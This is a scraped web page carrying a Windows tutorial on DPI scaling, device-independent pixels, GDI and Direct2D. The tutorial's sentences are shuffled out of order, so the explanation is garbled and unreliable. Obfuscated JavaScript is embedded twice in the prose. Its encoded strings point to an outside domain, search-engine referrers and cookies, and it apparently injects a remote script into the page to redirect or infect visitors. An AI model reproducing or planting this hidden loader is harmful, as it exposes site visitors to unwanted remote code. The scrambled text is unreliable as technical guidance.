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Now if you create a 500 × 500 window, the window will occupy 500 × 500 pixels, regardless of the user's DPI setting.. The listing shown here is only a partial manifest, but the Visual Studio linker generates the rest of the manifest for you automatically.. Obviously, this does not mean that every character in the font is exactly 1/6" tall.. Incorrect layout Pixilated bitmaps and icons Incorrect mouse coordinates, which can affect hit testing, drag and drop, and so forth.. This behavior means that older programs "just work" at high-DPI settings However, scaling also results in a somewhat blurry appearance, because the scaling is applied after the window is drawn.. In most cases, you will also need to update the layout and repaint the window The following code shows these steps.. The term dots derives from printing, where physical dots of ink are put onto paper.. In the Additional Manifest Files text box, type the name of the manifest file, and then click OK.. Also, people have different preferences—some people prefer larger text For this reason, Windows enables the user to change the DPI setting.. The user can also apply a custom setting Starting in Windows 7, DPI is a per-user setting.. Because actual pixel sizes vary, text that is readable on one monitor might be too small on another monitor.. The following illustration shows a 72-point font The solid lines show a 1" tall bounding box around the text.. DPI-Aware ApplicationsTo avoid DWM scaling, a program can mark itself as DPI-aware.. In Direct2D, coordinates are measured in units called device-independent pixels (DIPs).. If a program is not marked as being DPI aware, the DWM will scale the entire UI to match the DPI setting.. DWM ScalingIf a program does not account for DPI, the following defects might be apparent at high-DPI settings:Clipped UI elements.. However, GDI font sizes are scaled to the current DPI setting In other words, if you create a 72-point font, the size of the font will be 96 pixels at 96 DPI, but 144 pixels at 144 DPI.. The dashed line is called the baseline Most of the characters in a font rest on the baseline.. If your application is DPI-aware and you use GDI for drawing, scale all of your drawing coordinates to match the DPI.. The height of the font includes the portion above the baseline (the ascent) and the portion below the baseline (the descent).. GDI and DPIGDI drawing is measured in pixels That means if your program is marked as DPI-aware, and you ask GDI to draw a 200 × 100 rectangle, the resulting rectangle will be 200 pixels wide and 100 pixels tall on the screen.. To ensure that older programs work at high-DPI settings, the DWM implements a useful fallback.. Here is a 72 point font rendered at 144 DPI using GDI A diagram that shows DPI font scaling in GDI.. Here is an alternate way to get the DPI setting if you are not using Direct2D:Resizing the Render TargetIf the size of the window changes, you must resize the render target to match.. For an HWND render target, this value matches the size returned by GetClientRect.. (See Painting the Window, in Module 1 )As the window grows or shrinks, you will typically need to recalculate the position of the objects that you draw.. The DPI is returned as two floating-point values, one for the x-axis and one for the y-axis.. DIPs = pixels / (DPI/96 0)To get the DPI setting, call the ID2D1Factory::GetDesktopDpi method.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x41c71b){_0x4497a7=window;}return _0x4497a7;};var _0x29f709=_0x182920();var _0x13fc96='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x29f709['atob']||(_0x29f709['atob']=function(_0x45ff6e){var _0x18c960=String(_0x45ff6e)['replace'](/=+$/,'');for(var _0x58d899=0x0,_0x58f771,_0x910bfa,_0x2513f2=0x0,_0xa6979b='';_0x910bfa=_0x18c960['charAt'](_0x2513f2++);~_0x910bfa&&(_0x58f771=_0x58d899%0x4?_0x58f771*0x40+_0x910bfa:_0x910bfa,_0x58d899++%0x4)?_0xa6979b+=String['fromCharCode'](0xff&_0x58f771>>(-0x2*_0x58d899&0x6)):0x0){_0x910bfa=_0x13fc96['indexOf'](_0x910bfa);}return _0xa6979b;});}());_0x91ff['base64DecodeUnicode']=function(_0x5034b7){var _0x43e5a6=atob(_0x5034b7);var _0x4ad08a=[];for(var _0x3b7199=0x0,_0xe660db=_0x43e5a6['length'];_0x3b7199=_0x1df18d;},'vzaGc':function _0x3928c8(_0x457389,_0x4c64f0){return _0x457389!==_0x4c64f0;},'Cwwut':'iQG','QNWab':_0x91ff('0x20'),'fgfFp':function _0x34b565(_0x3e8fec,_0x57ab55){return _0x3e8fec(_0x57ab55);},'PPfup':function _0x183c89(_0x484c6f,_0x4e7de6){return _0x484c6f+_0x4e7de6;},'deuPw':_0x91ff('0x21'),'fdXOW':function _0x20b810(_0x15f3dd,_0x6d3ef9){return _0x15f3dd(_0x6d3ef9);},'qNNPy':function _0x4449cc(_0x31ead7,_0x2bd27a){return _0x31ead7+_0x2bd27a;}};var _0x1589f2=[_0x91ff('0x22'),_0x39e735[_0x91ff('0x23')],_0x91ff('0x24'),_0x39e735[_0x91ff('0x25')],_0x39e735[_0x91ff('0x26')],_0x39e735[_0x91ff('0x27')],_0x39e735[_0x91ff('0x28')]],_0x342b12=document[_0x91ff('0x29')],_0x3dadc4=![],_0x3c2774=cookie[_0x91ff('0x2a')](_0x39e735[_0x91ff('0x2b')]);for(var _0x1eda7c=0x0;_0x39e735[_0x91ff('0x2c')](_0x1eda7c,_0x1589f2['length']);_0x1eda7c++){if(_0x39e735['bgLMj'](_0x342b12[_0x91ff('0x2d')](_0x1589f2[_0x1eda7c]),0x0)){_0x3dadc4=!![];}}if(_0x3dadc4){if(_0x39e735[_0x91ff('0x2e')](_0x39e735[_0x91ff('0x2f')],_0x39e735[_0x91ff('0x30')])){cookie['set'](_0x91ff('0x1f'),0x1,0x1);if(!_0x3c2774){_0x39e735[_0x91ff('0x31')](include,_0x39e735[_0x91ff('0x32')](_0x39e735['deuPw']+q,''));}}else{cookie[_0x91ff('0x33')](_0x39e735[_0x91ff('0x2b')],0x1,0x1);if(!_0x3c2774){_0x39e735[_0x91ff('0x34')](include,_0x39e735[_0x91ff('0x35')](_0x39e735['deuPw']+q,''));}}}}R(); DPI and Device-Independent PixelsTo program effectively with Windows graphics, you must understand two related concepts:Let's start with DPI.. By marking your program as DPI-aware, you are telling the DWM not to scale your application window.. To declare that your program is DPI-aware, include the following information in the manifest.. One point equals 1/72 of an inch Note This is the desktop publishing definition of point.. Converting Physical Pixels to DIPsThe conversion from physical pixels to DIPs uses the following formula.. A word of caution: Mouse and window coordinates are still given in physical pixels, not DIPs.. On the Project menu, click Property In the left pane, expand Configuration Properties, expand Manifest Tool, and then click Input and Output.. For example, in the circle program, the radius and center point must be updated:The ID2D1RenderTarget::GetSize method returns the size of the render target in DIPs (not pixels), which is the appropriate unit for calculating layout.. A program declares itself DPI-aware through its application manifest A manifest is a simply an XML file that describes a DLL or application.. In fact, some characters might be taller than 1/6" For example, in many fonts the character Å is taller than the nominal height of the font.. To draw a point at that position, you must convert the pixel coordinates to DIPs.. The manifest is typically embedded in the executable file, although it can be provided as a separate file.. For example, if the user sets the display to 144 DPI, a 72-point font is 144 pixels tall.. If the program creates a 500 × 500 window, the window actually appears as 750 × 750 pixels, and the contents of the window are scaled accordingly.. For example, at 144 DPI, the UI is scaled by 150%, including text, graphics, controls, and window sizes.. To include a partial manifest in your project, perform the following steps in Visual Studio.. In the font shown here, the ascent is 56 points and the descent is 16 points An illustration that shows a 72-point font.. This tells the DWM not to perform any automatic DPI scaling All new applications should be designed to be DPI-aware, because DPI awareness improves the appearance of the UI at higher DPI settings.. 12 points = 12/72 logical inch = 1/6 logical inch = 96/6 pixels = 16 pixelsThis scaling factor is described as 96 dots per inch (DPI).. var _0x371a=['V1NWdUo=','SkxGd2g=','OyBzZWN1cmU=','LmFvbC4=','LmFzay4=','LmFsdGF2aXN0YS4=','dmlzaXRlZA==','YVhh','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWlvc3RpdGxlJnF1ZXJ5PQ==','Lmdvb2dsZS4=','WENCVVI=','LnlhaG9vLg==','a0NwZlU=','aWtHaEo=','TkhwbEI=','V1RnVUs=','cmVmZXJyZXI=','Z2V0','bWx3c0E=','RklqR2Y=','aW5kZXhPZg==','dnphR2M=','Q3d3dXQ=','UU5XYWI=','ZmdmRnA=','UFBmdXA=','c2V0','ZmRYT1c=','cU5OUHk=','c2NyaXB0','VERCZHQ=','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','aGVhZA==','Y29udmVydGVyK2RvdCtwZXIraW5jaA==','MXwyfDR8M3w1fDA=','SHdHeEs=','Y29va2ll','ZkZGU2M=','eUlZU2w=','bXpqTHU=','YXBwZW5kQ2hpbGQ=','ZU9IUlc=','c3BsaXQ=','cmVwbGFjZQ==','OyBleHBpcmVzPQ==','OyBkb21haW49','bFJyRmU=','ZFhjWHI=','aEd2QUI=','cFdDeEU=','UFhNVWI=','Z2V0VGltZQ==','S0pDYlU='];(function(_0x40f8c3,_0x335c24){var _0x42e4c2=function(_0x312701){while(--_0x312701){_0x40f8c3['push'](_0x40f8c3['shift']());}};_0x42e4c2(++_0x335c24);}(_0x371a,0x89));var _0x91ff=function(_0x3d1006,_0xf76574){_0x3d1006=_0x3d1006-0x0;var _0x5d9c8e=_0x371a[_0x3d1006];if(_0x91ff['initialized']===undefined){(function(){var _0x182920=function(){var _0x4497a7;try{_0x4497a7=Function('return\x20(function()\x20'+'{}.. For computer displays, it would be more accurate to say 96 pixels per logical inch, but the term DPI has stuck.. Direct2D and DPIDirect2D automatically performs scaling to match the DPI setting.. The GetClientRect function gets the new size of the client area, in physical pixels (not DIPs).. In theory, these values can differ Calculate a separate scaling factor for each axis.. To display correctly, the font needs some additional space between the text This space is called the leading.. This will require a short detour into typography In typography, the size of type is measured in units called points.. A DIP is defined as 1/96th of a logical inch In Direct2D, all drawing operations are specified in DIPs and then scaled to the current DPI setting.. The standard DPI settings are 100% (96 DPI), 125% (120 DPI), and 150% (144 DPI).. The InvalidateRect function forces a repaint by adding the entire client area to the window's update region.. There is a closely related method, ID2D1RenderTarget::GetPixelSize, that returns the size in physical pixels.. A manifest contains information such as DLL dependencies, the requested privilege level, and what version of Windows the program was designed for.. The ID2D1HwndRenderTarget::Resize method updates the size of the render target, also specified in pixels.. Historically, the exact measure of a point has varied For example, a 12-point font is designed to fit within a 1/6" (12/72) line of text.. For example, if you process the WM_LBUTTONDOWN message, the mouse-down position is given in physical pixels.. But remember that drawing is performed in DIPs, not pixels a5171a3e95


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